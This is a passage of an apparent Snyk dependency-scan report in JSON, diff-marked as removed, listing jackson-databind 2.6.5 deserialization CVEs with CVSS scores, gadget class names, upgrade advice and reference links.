addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36186" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:05:16.831143Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.206083Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.695573Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.249724Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36180" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:08:29.105792Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:05:51Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.705041Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3003", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.268380Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36183" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:11:36.206859Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:10:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.627750Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.831271Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.319616Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.72318", - "probability": "0.00357", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36179" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:29:22.463416Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:12:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.759947Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.436792Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36182" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:30:54.237288Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:30:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.693276Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - 